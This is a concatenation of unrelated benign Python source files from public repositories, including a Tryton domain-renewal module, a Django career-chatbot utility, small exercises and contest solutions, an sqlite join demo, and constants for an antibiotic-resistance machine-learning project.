            order=[('date_renewal', 'DESC')]
        )
        if len(renewals)>0:
            renewal = Renewal(renewals[0].id)
        return renewal
    def get_registrator(self, name=None):
        """Get registrator from domain"""
        renewal = self.get_last_renewal()
        return renewal and renewal.registrator.id or None
    def get_registrator_website(self, name=None):
        """Get registrator website from domain"""
        renewal = self.get_last_renewal()
        return renewal and renewal.registrator.website or None
    def get_expire(self, name=None):
        """Get expire date from domain"""
        renewal = self.get_last_renewal()
        return renewal and renewal.date_expire or None
    @classmethod
    def search_expire(cls, name, clause):
        # Delegate searches on the function field to the renewal's date_expire.
        return [('renewal.date_expire',) + tuple(clause[1:])]
    @classmethod
    def get_warning(cls, records, name):
        """Get warning if last registration pass today"""
        result = {}
        for domain in records:
            warning_expire = False
            # idomain_alert_expire is a comma-separated list of alert windows
            # (in days) configured on the company; the largest one is used.
            if not domain.company.idomain_alert_expire:
                max_alert = 30 #30 days
            else:
                intdomain_alert_expire = domain.company.idomain_alert_expire.split(',')
                intdomain_alert_expire = [int(x) for x in intdomain_alert_expire]
                max_alert = intdomain_alert_expire[0]
                for x in intdomain_alert_expire:
                    if x > max_alert:
                        max_alert = x
            if domain.date_expire:
                today = datetime.date.today()
                date_exp = domain.date_expire
                diff_date = datetime.timedelta()
                diff_date = date_exp - today
                # Warn when expiry is within the alert window (or already past).
                if diff_date.days <= max_alert:
                    warning_expire = True
            result[domain.id] = warning_expire
        return result
    @fields.depends('party', 'party_address')
    def on_change_party(self):
        # Auto-fill the address with the party's default one when empty.
        if self.party and not self.party_address:
            address = self.party.address_get()
            self.party_address = address
    @fields.depends('registrator')
    def on_change_registrator(self):
        """When change registrator, get website value"""
        Party = Pool().get('party.party')
        if self.registrator:
            party = Party.browse([self.registrator])[0]
            self.registrator_website = party.website and \
                party.website or None
# One renewal event of a domain: when it was renewed, when it will expire,
# and which registrator handled it. The class docstring is the Tryton model
# display name — keep it as-is.
class Renewal(ModelSQL, ModelView):
    'Renewal'
    __name__ = 'internetdomain.renewal'
    # Deleting a domain cascades to its renewals.
    domain = fields.Many2One('internetdomain.domain', 'Domain',
        ondelete='CASCADE', select=True, required=True)
    date_renewal = fields.Date('Date Renewal', required=True)
    date_expire = fields.Date('Date Expire', required=True)
    registrator = fields.Many2One('party.party', 'Registrator', required=True)
    comment = fields.Text('Comment')
# Many-to-many relation table linking domains to products.
class DomainProduct(ModelSQL):
    'Domain - Product'
    __name__ = 'internetdomain.domain-domain.product'
    _table = 'internetdomain_domain_product_rel'
    domain = fields.Many2One('internetdomain.domain', 'Domain', ondelete='CASCADE',
        required=True, select=True)
    product = fields.Many2One('product.product', 'Product',
        ondelete='CASCADE', required=True, select=True)
| NaN-tic/trytond-internetdomain | internetdomain.py | internetdomain.py | py | 5,670 | python | en | code | 0 | github-code | 90 |
12675139791 | """Utility methods."""
import hashlib
def equal_dicts(a, b, ignore_keys):
    """Return True if dicts *a* and *b* are equal once *ignore_keys* are dropped.

    From: http://stackoverflow.com/a/10480904/383744
    """
    keys_a = set(a) - set(ignore_keys)
    keys_b = set(b) - set(ignore_keys)
    if keys_a != keys_b:
        return False
    return all(a[key] == b[key] for key in keys_a)
def file_md5(fname):
    """Return the hex MD5 digest of the file at *fname*.

    The file is read in 4 KiB blocks so large files don't load into memory.

    From: https://stackoverflow.com/a/3431838/383744
    """
    digest = hashlib.md5()
    with open(fname, "rb") as handle:
        while True:
            block = handle.read(4096)
            if not block:
                break
            digest.update(block)
    return digest.hexdigest()
def read_in_chunks(f, chunk_size=51200000):
    """Yield successive chunks (default 50 MB) read from file object *f*.

    Works for both text and binary file objects; stops on the first empty read.
    """
    data = f.read(chunk_size)
    while data:
        yield data
        data = f.read(chunk_size)
| radusuciu/ip2api | ip2api/utils.py | utils.py | py | 826 | python | en | code | 1 | github-code | 90 |
1757847495 | from django.db.models import Count
from Level_Up_App.models import CareerSkills, CareerPosition, Skill, Job, GenericInfo, CareerPathMap, ChatbotVar
from Level_Up_App.courserecommendationrules import CourseRecommender, SkillGapsFact, recommendedcourses
from Level_Up_App.jobrecommendationrules import getJobRecommendation
from Level_Up_App.careerknowledgegraph import *
from Level_Up_App.CareerPathASTARSearch import *
def getJobCompetency(jobtitle):
    """Return up to 20 required-skill names for the career position *jobtitle*."""
    position = CareerPosition.objects.get(name=jobtitle)
    required = CareerSkills.objects.get(careerpos=position).skillRequired.all()
    # Cap the list the same way the chatbot caps elicited competencies.
    if len(required) > 20:
        required = required[:20]
    return [str(skill) for skill in required]
def getHighestDemandJob():
    """Return the name of the CareerPosition with the most Job postings.

    Falls back to the first position when no jobs exist. Ties keep the
    earliest position in the default queryset ordering (strictly-greater
    comparison), matching the original per-position counting loop.
    """
    allcareerpos = CareerPosition.objects.all()
    hdjob = allcareerpos[0].name
    highest = 0
    # One aggregated query instead of one COUNT query per position (N+1 fix).
    # Job.name is the FK to CareerPosition, so values('name') yields its pk.
    counts = {
        row['name']: row['total']
        for row in Job.objects.values('name').annotate(total=Count('name'))
    }
    for pos in allcareerpos:
        count = counts.get(pos.pk, 0)
        if count > highest:
            highest = count
            hdjob = pos.name
    return hdjob
def getJobEducationLevel(jobtitle):
    """Education level required for *jobtitle*, as a string."""
    return str(queryGenericInfo(jobtitle).eduLvl)
def getJobSalary(jobtitle):
    """Salary range for *jobtitle*, as a string."""
    return str(queryGenericInfo(jobtitle).salaryRange)
def getJobDescription(jobtitle):
    """Free-text description of *jobtitle*."""
    return str(queryGenericInfo(jobtitle).description)
def getJobMinYearsExperience(jobtitle):
    """Minimum years of experience for *jobtitle*, as a string."""
    return str(queryGenericInfo(jobtitle).minYears)
def queryGenericInfo(jobtitle):
    """Look up the GenericInfo record for the named career position."""
    careerpos = CareerPosition.objects.get(name=jobtitle)
    return GenericInfo.objects.get(title=careerpos)
def getCareerPath(currentjobtitle, aspiredjobtitle):
    """Run A* search over the career knowledge graph.

    Returns whatever searchCareerPath returns — a (cost, path) pair, where
    path is the ordered list of positions from current to aspired title.
    """
    graph_builder = CareerPathKnowledgeGraph()
    knowledge_map = graph_builder.getCareerKnowledgeMap()
    heuristic = graph_builder.getCareerPathHeuristic()
    return searchCareerPath(knowledge_map, heuristic, currentjobtitle, aspiredjobtitle)
#****************************************
# Methods for elicit competence : START
#****************************************
def elicit_competence_with_endgoal(currPos, endGoal):
    """Skills to ask the user about for the first step toward *endGoal*.

    Computes the career path, takes the next position after the current one,
    and returns the skill gap between the two (capped at 20 entries).
    """
    cost, career_path = getCareerPath(currPos, endGoal)
    next_position = career_path[1]  # first hop after the current position
    competencies = getListofCompetencetoAskUserWithCRoadMap(currPos, next_position)
    return competencies[:20]
def elicit_competence_without_endgoal(currPos):
    """Skills to ask the user about across all possible next positions
    (no end goal), capped at 20 entries.
    """
    return getListofCompetencetoAskUserWithoutCRoadMap(currPos)[:20]
#****************************************
# Methods for elicit competence : END
#****************************************
#****************************************
# Methods for jobs recomendation : START
#****************************************
def jobsrecommendation_with_endgoal(currPos, endGoal, userCompetence):
    """Job recommendations (wrapped as Dialogflow cards) for a user with a
    stated career end goal; empty list when the user reported no competence.
    """
    if not userCompetence:
        return list()
    skills = elicit_competence_with_endgoal(currPos, endGoal)
    # NOTE(review): userCompetence is appended as a single element, not
    # merged element-wise — confirm callers pass a scalar here.
    skills.append(userCompetence)
    return wrapJobRecommendation(getJobRecommendation(skills))
def jobsrecommendation_without_endgoal(currPos, userCompetence):
    """Job recommendations (wrapped as Dialogflow cards) for a user with no
    stated end goal; empty list when the user reported no competence.
    """
    if not userCompetence:
        return list()
    skills = elicit_competence_without_endgoal(currPos)
    # NOTE(review): userCompetence is appended as a single element, not
    # merged element-wise — confirm callers pass a scalar here.
    skills.append(userCompetence)
    return wrapJobRecommendation(getJobRecommendation(skills))
#****************************************
# Methods for jobs recommendation : END
#****************************************
#*****************************************
# Methods for course recomendation : START
#*****************************************
def courserecommendation_with_endgoal(currPos, endGoal, userCompetence):
    """Course recommendations for the skills the user reported beyond the
    baseline competence set for the path toward *endGoal*.

    Returns an empty list when the user's set matches the baseline exactly.
    """
    baseline = elicit_competence_with_endgoal(currPos, endGoal)
    if set(userCompetence) == set(baseline):
        return list()
    extra_skills = [skill for skill in userCompetence if skill not in baseline]
    return wrapCourseRecommendation(getCourseRecommendation(extra_skills))
def courserecommendation_without_endgoal(currPos, userCompetence):
    """Course recommendations for the skills the user reported beyond the
    baseline competence set (no stated end goal).

    Returns an empty list when the user's set matches the baseline exactly.
    """
    baseline = elicit_competence_without_endgoal(currPos)
    if set(userCompetence) == set(baseline):
        return list()
    extra_skills = [skill for skill in userCompetence if skill not in baseline]
    return wrapCourseRecommendation(getCourseRecommendation(extra_skills))
def getCourseRecommendation(skillgap):
    """Run the course-recommendation rule engine over *skillgap*.

    The rules append their matches to the module-level `recommendedcourses`
    list imported from courserecommendationrules, which is what gets returned.
    """
    engine = CourseRecommender()
    engine.reset()
    engine.declare(SkillGapsFact(skills=skillgap))
    engine.run()
    return recommendedcourses
#*****************************************
# Methods for course recomendation : END
#*****************************************
def getListofCompetencetoAskUserWithoutCRoadMap(currPos):  # Input is a string
    """Skills required by any next position that the current position lacks."""
    current_skills = getCareerSkillList(currPos)
    candidate_skills = getCombinedSkillReqFromNextPos(currPos)
    return [skill for skill in candidate_skills if skill not in current_skills]
def getListofCompetencetoAskUserWithCRoadMap(currPos, nextPos):  # Both inputs are strings
    """Skills required by *nextPos* that the current position lacks."""
    current_skills = getCareerSkillList(currPos)
    target_skills = getCareerSkillList(nextPos)
    return [skill for skill in target_skills if skill not in current_skills]
def getCareerSkillList(pos):  # Input is a string
    """All Skill objects required for the named career position, as a list."""
    position = CareerPosition.objects.get(name=pos)
    requirements = CareerSkills.objects.get(careerpos=position)
    return list(requirements.skillRequired.all())
def getCombinedSkillReqFromNextPos(currPos):  # Input is a string
    """Flattened required skills of every next position (duplicates kept)."""
    combined = []
    for position in getCombinedListofNextPos(currPos):
        requirement = CareerSkills.objects.get(careerpos=position)
        combined.extend(requirement.skillRequired.all())
    return combined
def getCombinedListofNextPos(currPos):  # Input is a string
    """All `nextpos` positions reachable from the current position."""
    return [edge.nextpos for edge in getCareerPathMap(currPos)]
def getCareerPathMap(currPos):  # Input is a string
    """Queryset of CareerPathMap rows starting from the named position."""
    current = CareerPosition.objects.get(name=currPos)
    return CareerPathMap.objects.filter(initialpos=current)
#*****************************************
# Methods for chat bot variable : START
#*****************************************
# Thin accessors around the singleton ChatbotVar row (pk=1). Each getter
# reads through the model's get_* method; each setter writes through the
# matching set_* method and persists immediately with save().
def getPersona():
    cbv = getChatbotVar()
    return cbv.get_persona()
def setPersona(persona):
    cbv = getChatbotVar()
    cbv.set_persona(persona)
    cbv.save()
def getCurrentPosition():
    cbv = getChatbotVar()
    return cbv.get_currentPosition()
def setCurrentPosition(currentPosition):
    cbv = getChatbotVar()
    cbv.set_currentPosition(currentPosition)
    cbv.save()
def getYearsOfWorkingExperience():
    cbv = getChatbotVar()
    return cbv.get_yearsOfWorkingExperience()
def setYearsOfWorkingExperience(yearsOfWorkingExperience):
    cbv = getChatbotVar()
    cbv.set_yearsOfWorkingExperience(yearsOfWorkingExperience)
    cbv.save()
def getCompanyName():
    cbv = getChatbotVar()
    return cbv.get_companyName()
def setCompanyName(companyName):
    cbv = getChatbotVar()
    cbv.set_companyName(companyName)
    cbv.save()
def getEmailAddress():
    cbv = getChatbotVar()
    return cbv.get_emailAddress()
def setEmailAddress(emailAddress):
    cbv = getChatbotVar()
    cbv.set_emailAddress(emailAddress)
    cbv.save()
def getJobInterestedIn():
    cbv = getChatbotVar()
    return cbv.get_jobInterestedIn()
def setJobInterestedIn(jobInterestedIn):
    cbv = getChatbotVar()
    cbv.set_jobInterestedIn(jobInterestedIn)
    cbv.save()
def getCareerEndGoalPosition():
    cbv = getChatbotVar()
    return cbv.get_careerEndGoalPosition()
def setCareerEndGoalPosition(careerEndGoalPosition):
    cbv = getChatbotVar()
    cbv.set_careerEndGoalPosition(careerEndGoalPosition)
    cbv.save()
def getCurrentSkillset():
    cbv = getChatbotVar()
    return cbv.get_currentSkillset()
def setCurrentSkillset(currentSkillset):
    cbv = getChatbotVar()
    cbv.set_currentSkillset(currentSkillset)
    cbv.save()
def getCareerPref():
    cbv = getChatbotVar()
    return cbv.get_careerPref()
def setCareerPref(careerPref):
    cbv = getChatbotVar()
    # Career preference is normalized to upper case before storing.
    cbv.set_careerPref(careerPref.upper())
    cbv.save()
def getCourseSkillRecommendation():
    cbv = getChatbotVar()
    return cbv.get_courseSkillRecommend()
def setCourseSkillRecommendation(courseSkillRecommend):
    cbv = getChatbotVar()
    cbv.set_courseSkillRecommend(courseSkillRecommend)
    cbv.save()
def getJobSkillRecommendation():
    cbv = getChatbotVar()
    return cbv.get_jobSkillRecommend()
# NOTE: the misspelled name ('Sklll') is kept for caller compatibility.
def setJobSklllRecommendation(jobSkillRecommend):
    cbv = getChatbotVar()
    cbv.set_jobSkillRecommend(jobSkillRecommend)
    cbv.save()
def getChatbotVar():
    # The chatbot state lives in a single well-known row (pk=1).
    return ChatbotVar.objects.get(pk=1)
#*****************************************
# Methods for chat bot variable : END
#*****************************************
#*********************************************
# Methods for Facebook button wrapper : START
#*********************************************
def wrapCourseRecommendation(courseList):
    """Build a fulfillment response carrying up to 10 course cards."""
    resp = {
        'fulfillmentText': "Error showing course recommendation!",
        'fulfillmentMessages': [
            buildCard(
                title=course.title,
                subtitle=course.coursecode,
                imageUrl="https://assistant.google.com/static/images/molecule/Molecule-Formation-stop.png",
                cardText="Course Link",
                cardUrl=course.URL,
            )
            # Cap at 10 cards, matching the original truncation.
            for course in courseList[:10]
        ],
    }
    return resp
def wrapJobRecommendation(jobList):
    """Build a fulfillment response carrying up to 10 job cards."""
    resp = {
        'fulfillmentText': "Error showing job recommendation!",
        'fulfillmentMessages': [
            buildCard(
                title=job.title,
                subtitle=job.company,
                imageUrl="https://assistant.google.com/static/images/molecule/Molecule-Formation-stop.png",
                cardText="Job Link",
                cardUrl=job.URL,
            )
            # Cap at 10 cards, matching the original truncation.
            for job in jobList[:10]
        ],
    }
    return resp
def buildCard(title, subtitle, imageUrl, cardText, cardUrl):
    """Return a single card message dict with one postback button."""
    button = {"text": cardText, "postback": cardUrl}
    return {
        "card": {
            "title": title,
            "subtitle": subtitle,
            "imageUri": imageUrl,
            "buttons": [button],
        }
    }
#*********************************************
# Methods for Facebook button wrapper : END
#*********************************************
#*********************************************
# Methods for Facebook Cards Text : START
#*********************************************
def signUp():
    """Return the static sign-up card response."""
    signup_card = {
        "card": {
            "title": "Level Up",
            "subtitle": "Your Personal Career Coach",
            "imageUri": "https://assistant.google.com/static/images/molecule/Molecule-Formation-stop.png",
            "buttons": [
                {
                    "text": "Sign Up Here!",
                    "postback": "https://www.google.com/",
                }
            ],
        }
    }
    return {
        'fulfillmentText': "Error showing signup button!",
        'fulfillmentMessages': [signup_card],
    }
def cardsAppend(cardsRec, appendText):
    """Append a plain-text message after the cards (mutates cardsRec in place)."""
    cardsRec['fulfillmentMessages'].append({"text": {"text": [appendText]}})
    return cardsRec
def cardsWrap(cardsRec, insertText):
    """Insert a plain-text message before the cards (mutates cardsRec in place)."""
    cardsRec['fulfillmentMessages'].insert(0, {"text": {"text": [insertText]}})
    return cardsRec
#*********************************************
# Methods for Facebook Cards Text : END
#*********************************************
| raymondng76/IRS-MR-RS-2019-07-01-IS1FT-GRP-Team10-LevelUp | SystemCode/Level_Up/Level_Up_App/chatbot_util.py | chatbot_util.py | py | 12,615 | python | en | code | 2 | github-code | 90 |
13109668945 | #Este programa irá calcula os juros compostos baseado em uma % de x parcelas de qualquer valor
class Calculadora:
    """Compound-interest calculator.

    valor1 is the annual interest rate in percent; valor2 is the amount to
    be paid off.
    """

    def __init__(self, valor1=0.0, valor2=0.0):
        self.valor1 = valor1
        self.valor2 = valor2

    def calcular(self, quantidadeParcelas):
        """Return the total paid over quantidadeParcelas installments.

        The base installment is the amount split evenly; each subsequent
        installment grows by the monthly rate (annual rate / 12).
        """
        parcela = self.valor2 / quantidadeParcelas
        taxa_mensal = self.valor1 / 12  # monthly interest rate, in percent
        total = 0.0
        for _ in range(quantidadeParcelas):
            total += parcela
            parcela = parcela * (1 + (taxa_mensal / 100))
        return total
# Interactive driver: read rate, installment count and principal, then show
# the compound total and the even per-installment value.
print("Juros: ")
j = float(input())
print("Qual a quantidade de parcelas: ")
q = int(input())
print("Valor do emprestimo: ")
vTotal = float(input())
# valor1 is the interest rate, valor2 the total loan amount
calculo = Calculadora(j, vTotal)
vTotal = calculo.calcular(q)
print("Valor total à pagar será: ", vTotal)
# BUG FIX: the even-installment value must divide by the number of
# installments the user entered (q), not a hard-coded 6.
print("Valor das pacelas em igual: ", vTotal/q)
35043100501 | #! /usr/bin/python3
class DrNabi:
    """Simple record of a person's job and marital status."""

    # Class-level attribute shared by all instances.
    father_of = "Dr.Ayoubzai"

    def __init__(self, job, marital):
        self.job = job
        self.marital = marital

    def __str__(self):
        return f"({self.job}, {self.marital})"

    def like_travel(self):
        # BUG FIX: the original did `print(like_travel)`, which raised a
        # NameError because no such variable exists. Print a message instead.
        print(f"({self.job}, {self.marital}) likes to travel")
# Build three sample people and print each one via __str__.
atal = DrNabi("Doctor", "married")
aimal = DrNabi("lawer", "married")
qais = DrNabi("tech", "single")
for person in (atal, aimal, qais):
    print(person)
| atal2003/Python-Hack-script | linux/ninteenclass.py | ninteenclass.py | py | 437 | python | en | code | 0 | github-code | 90 |
18283031369 | import sys
sys.setrecursionlimit(10 ** 7)  # allow deep recursion (contest boilerplate)
input = sys.stdin.readline  # fast input; NOTE: shadows the builtin input()
f_inf = float('inf')  # sentinel "infinity" (unused in this snippet)
mod = 10 ** 9 + 7  # common contest modulus (unused in this snippet)
def resolve():
    """Count ordered pairs (A, B) in 1..n where A's first digit equals B's
    last digit and A's last digit equals B's first digit."""
    n = int(input())
    # counts[h][f] = how many numbers in 1..n start with digit h and end with f
    counts = [[0] * 10 for _ in range(10)]
    for value in range(1, n + 1):
        digits = str(value)
        counts[int(digits[0])][int(digits[-1])] += 1
    # Each number with head h / foot f pairs with every number whose head is
    # f and whose foot is h.
    answer = sum(
        counts[int(str(value)[-1])][int(str(value)[0])]
        for value in range(1, n + 1)
    )
    print(answer)


if __name__ == '__main__':
    resolve()
| Aasthaengg/IBMdataset | Python_codes/p02792/s112589516.py | s112589516.py | py | 519 | python | en | code | 0 | github-code | 90 |
42598355546 | import re
def matched(string):
    """Map a matched '&&' or '||' token to its word equivalent."""
    return {'&&': 'and', '||': 'or'}[string.group(0)]
# Match '&&' / '||' only when surrounded by whitespace; the lookbehind and
# lookahead keep the surrounding spaces out of the match.
pattern = re.compile(r'(?<=\s)&&(?=\s)|(?<=\s)\|\|(?=\s)')
# First input line gives the number of lines to transform; rewrite each one.
for _ in range(int(input())):
    print(re.sub(pattern, matched, input()))
| praneeth14/Hackerrank | Python/Regex and Parsing/Regex Substitution.py | Regex Substitution.py | py | 255 | python | en | code | 1 | github-code | 90 |
18548954009 | import sys
# Convenience aliases for fast stdin access (contest boilerplate).
read = sys.stdin.read
readline = sys.stdin.readline
readlines = sys.stdin.readlines
sys.setrecursionlimit(10 ** 9)  # allow very deep recursion
INF = 1 << 60  # sentinel "infinity" (unused in this snippet)
MOD = 1000000007  # common contest modulus (unused in this snippet)
def main():
    """Print the K smallest and K largest integers in [A, B], without
    printing any value twice."""
    A, B, K = map(int, readline().split())
    span = B - A + 1
    if span < 2 * K:
        # The two ranges would overlap, so every value qualifies.
        wanted = list(range(A, B + 1))
    else:
        wanted = list(range(A, A + K)) + list(range(B - K + 1, B + 1))
    print(*wanted, sep='\n')
    return


if __name__ == '__main__':
    main()
| Aasthaengg/IBMdataset | Python_codes/p03386/s651267619.py | s651267619.py | py | 435 | python | en | code | 0 | github-code | 90 |
11523225301 | import sqlite3
# Open (or create) the local SQLite database file.
conn = sqlite3.connect("sqlite.db")
# Header row for the joined output printed below.
print("Student id","Student name","Student class","Student fees")
#inner join
# data = conn.execute("SELECT f.st_id,s.st_name,s.st_class,f.fees_amount from fees as f inner join students as s on f.st_id=s.st_id ")
#left join
data = conn.execute("SELECT f.st_id,s.st_name,s.st_class,f.fees_amount from fees as f left join students as s on f.st_id=s.st_id ")
#right and full join not supported in sqlite3
# One row per fees record; student columns are NULL when unmatched (LEFT JOIN).
for n in data:
    print(n[0] ,n[1] ,n[2], n[3])
7165686230 | import numpy as np
# --- Undersampling strategy identifiers ----------------------------------
US_IMBLEARN = 'imblearn_undersampled'
US_RANDOM = 'random_undersampled'
US_NO = 'not_undersampled'
# --- Bacterial species labels --------------------------------------------
SPECIES_ECOLI = 'Escherichia coli'
SPECIES_SAUREUS = 'Staphylococcus aureus'
SPECIES_KLEBSIELLA = 'Klebsiella pneumoniae'
SPECIES_EPIDERMIS = 'Staphylococcus epidermis'
# --- Antibiotic names; trailing comments note which species each applies to
ANTIBIOTIC_CIPROFLOXACIN ='Ciprofloxacin' # all
ANTIBIOTIC_CEFTRIAXONE = 'Ceftriaxone' # no saureus
ANTIBIOTIC_CEFEPIME ='Cefepime'# no saureus
ANTIBIOTIC_PIPTAZ = 'Piperacillin-Tazobactam' # only ecoli
ANTIBIOTIC_TOBRAMYCIN ='Tobramycin'# no saureus
ANTIBIOTIC_FUSIDICACID ='Fusidic acid' # only saureus
ANTIBIOTIC_OXACILLIN ='Oxacillin' # only saureus
ANTIBIOTIC_MEROPENEM ='Meropenem' # only kpneu
ANTIBIOTIC_VANCOMYCIN = 'Vancomycin'
# --- Binning resolution identifiers --------------------------------------
BINNING_6K = '6k'
BINNING_18K = '18k'
BINNING_18K_RAW = 'RAW'
# --- Dataset identifiers -------------------------------------------------
DATASET_DRIAMSA ='DRIAMS_A'
DATASET_DRIAMSB ='DRIAMS_B'
DATASET_ALL ='DRIAMS_ABCD'
DATASET_SPECIES_COMBINED ='DRIAMS_A_ALL_SPECIES'
# Random State for algorithms that have some randomness to make it reproducable use it
RANDOM_STATE=42
# --- Model / method identifiers ------------------------------------------
METHOD_TREE = 'tree'
METHOD_RFO = 'rfo'
METHOD_DUMMY = 'dummy'
METHOD_LR = 'logreg'
METHOD_MLP = 'mlp'
METHOD_CNN = 'cnn'
# --- Keys for neural-network hyper-parameter dicts -----------------------
IN_FEATURES = 'in_features'
LEARNING_RATE='learning_rate'
EPOCHS = 'epochs'
WEIGHTED_FLAG = 'weighted_flag'
BATCH_SIZE = 'batch_size'
# Evaluation
PREDICTIONS = 'preds'
PROBABILITIES = 'probas'
BEST_PARAMS = 'best_params'
LOSSES = 'losses'
BEST_PREDS ='best_preds'
BEST_PROBAS ='best_probas'
### Grid Search Parameters for Baseline Methods
PARAM_GRID_TREE = {
    'criterion': ['gini','entropy'],
    'class_weight': ['balanced', None],
    'max_depth': [8,32,128,512,None],
    'max_features': ['sqrt','log2',None]
}
PARAM_GRID_LR = {
    'C': 10.0 ** np.arange(-3, 4), # 10^{-3}..10^{3} (10^-1...10^4)
    'solver':['liblinear','saga'],
    'penalty': ['l1', 'l2'],
    'class_weight':['balanced',None]
}
PARAM_GRID_RFO = {
    'criterion': ['gini', 'entropy'],
    'n_estimators': [10,100,500,1000],
    'max_features': ['sqrt', 'log2'],
    'class_weight': ['balanced', None]
}
PARAM_GRID_DUMMY = {
    'strategy': ['uniform','stratified','prior','most_frequent']
}
################## DEEP LEARNING CONSTS #####################
OUTPUT_DIM = 1
''' All Antibiotics and their categorization inside of DRIAMS
# antibiotic categorization
ab_cat_map = {'5-Fluorocytosine': 'ANTIMYCOTICS FOR SYSTEMIC USE',
'Amikacin': 'AMINOGLYCOSIDE ANTIBACTERIALS',
'Aminoglycosides': 'AMINOGLYCOSIDE ANTIBACTERIALS',
'Amoxicillin': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Amoxicillin-Clavulanic acid': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Amoxicillin-Clavulanic acid_uncomplicated_HWI': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Amphotericin B': 'ANTIMYCOTICS FOR SYSTEMIC USE',
'Ampicillin-Amoxicillin': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Anidulafungin': 'ANTIMYCOTICS FOR SYSTEMIC USE',
'Azithromycin': 'MACROLIDES, LINCOSAMIDES AND STREPTOGRAMINS',
'Aztreonam': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Caspofungin': 'ANTIMYCOTICS FOR SYSTEMIC USE',
'Cefazolin': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Cefepime': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Cefixime': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Cefoxitin_screen': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Cefpodoxime': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Ceftazidime': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Ceftriaxone': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Cefuroxime': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Chloramphenicol': 'AMPHENICOLS',
'Ciprofloxacin': 'QUINOLONE ANTIBACTERIALS',
'Clarithromycin': 'MACROLIDES, LINCOSAMIDES AND STREPTOGRAMINS',
'Clindamycin': 'MACROLIDES, LINCOSAMIDES AND STREPTOGRAMINS',
'Colistin': 'OTHER ANTIBACTERIALS',
'Cotrimoxazole': 'SULFONAMIDES AND TRIMETHOPRIM',
'Daptomycin': 'OTHER ANTIBACTERIALS',
'Doxycycline': 'TETRACYCLINES',
'Ertapenem': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Erythromycin': 'MACROLIDES, LINCOSAMIDES AND STREPTOGRAMINS',
'Fluconazole': 'ANTIMYCOTICS FOR SYSTEMIC USE',
'Fosfomycin': 'OTHER ANTIBACTERIALS',
'Fosfomycin-Trometamol': 'OTHER ANTIBACTERIALS',
'Fusidic acid': 'OTHER ANTIBACTERIALS',
'Gentamicin': 'AMINOGLYCOSIDE ANTIBACTERIALS',
'Gentamicin_high_level': 'AMINOGLYCOSIDE ANTIBACTERIALS',
'Imipenem': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Itraconazole': 'ANTIMYCOTICS FOR SYSTEMIC USE',
'Levofloxacin': 'QUINOLONE ANTIBACTERIALS',
'Linezolid': 'OTHER ANTIBACTERIALS',
'Meropenem': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Meropenem_with_meningitis': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Meropenem_with_pneumonia': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Meropenem_without_meningitis': 'OTHER BETA-LACTAM ANTIBACTERIALS',
'Metronidazole': 'OTHER ANTIBACTERIALS',
'Micafungin': 'ANTIMYCOTICS FOR SYSTEMIC USE',
'Minocycline': 'TETRACYCLINES',
'Moxifloxacin': 'QUINOLONE ANTIBACTERIALS',
'Mupirocin': 'ANTIBIOTICS FOR TOPICAL USE',
'Nitrofurantoin': 'OTHER ANTIBACTERIALS',
'Norfloxacin': 'QUINOLONE ANTIBACTERIALS',
'Oxacillin': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Penicillin': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Penicillin_with_endokarditis': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Penicillin_with_meningitis': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Penicillin_with_other_infections': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Penicillin_with_pneumonia': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Penicillin_without_endokarditis': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Piperacillin-Tazobactam': 'BETA-LACTAM ANTIBACTERIALS, PENICILLINS',
'Posaconazole': 'ANTIMYCOTICS FOR SYSTEMIC USE',
'Quinolones': 'QUINOLONE ANTIBACTERIALS',
'Rifampicin': 'DRUGS FOR TREATMENT OF TUBERCULOSIS',
'Rifampicin_1mg-l': 'DRUGS FOR TREATMENT OF TUBERCULOSIS',
'Teicoplanin': 'OTHER ANTIBACTERIALS',
'Teicoplanin_GRD': 'OTHER ANTIBACTERIALS',
'Tetracycline': 'TETRACYCLINES',
'Tigecycline': 'TETRACYCLINES',
'Tobramycin': 'AMINOGLYCOSIDE ANTIBACTERIALS',
'Vancomycin': 'OTHER ANTIBACTERIALS',
'Vancomycin_GRD': 'OTHER ANTIBACTERIALS',
'Voriconazole': 'ANTIMYCOTICS FOR SYSTEMIC USE',
}
# antibiotic naming
ab_name_map = {
'AN-Amikacin': 'Amikacin',
'Amikacin': 'Amikacin',
'Amikacin 01 mg/l': 'Amikacin_1mg-l',
'Amikacin 04 mg/l': 'Amikacin_4mg-l',
'Amikacin 20 mg/l': 'Amikacin_20mg-l',
'Aminoglykoside': 'Aminoglycosides',
'Amoxicillin...Clavulansaeure.bei.unkompliziertem.HWI': 'Amoxicillin-Clavulanic acid_uncomplicated_HWI',
'Amoxicillin-Clavulansaeure.unkompl.HWI': 'Amoxicillin-Clavulanic acid_uncomplicated_HWI',
'Amoxicillin-Clavulan': 'Amoxicillin-Clavulanic acid',
'AMC-Amoxicillin/Clavulans\xc3\xa4ure': 'Amoxicillin-Clavulanic acid',
'Amoxicillin-Clavulansaeure': 'Amoxicillin-Clavulanic acid',
'Amoxicillin/Clavulansäure': 'Amoxicillin-Clavulanic acid',
'Amoxicillin...Clavulansaeure': 'Amoxicillin-Clavulanic acid',
'Amoxicillin/Clavulansaeure': 'Amoxicillin-Clavulanic acid',
'Amoxicillin': 'Amoxicillin',
'AMX-Amoxicillin': 'Amoxicillin',
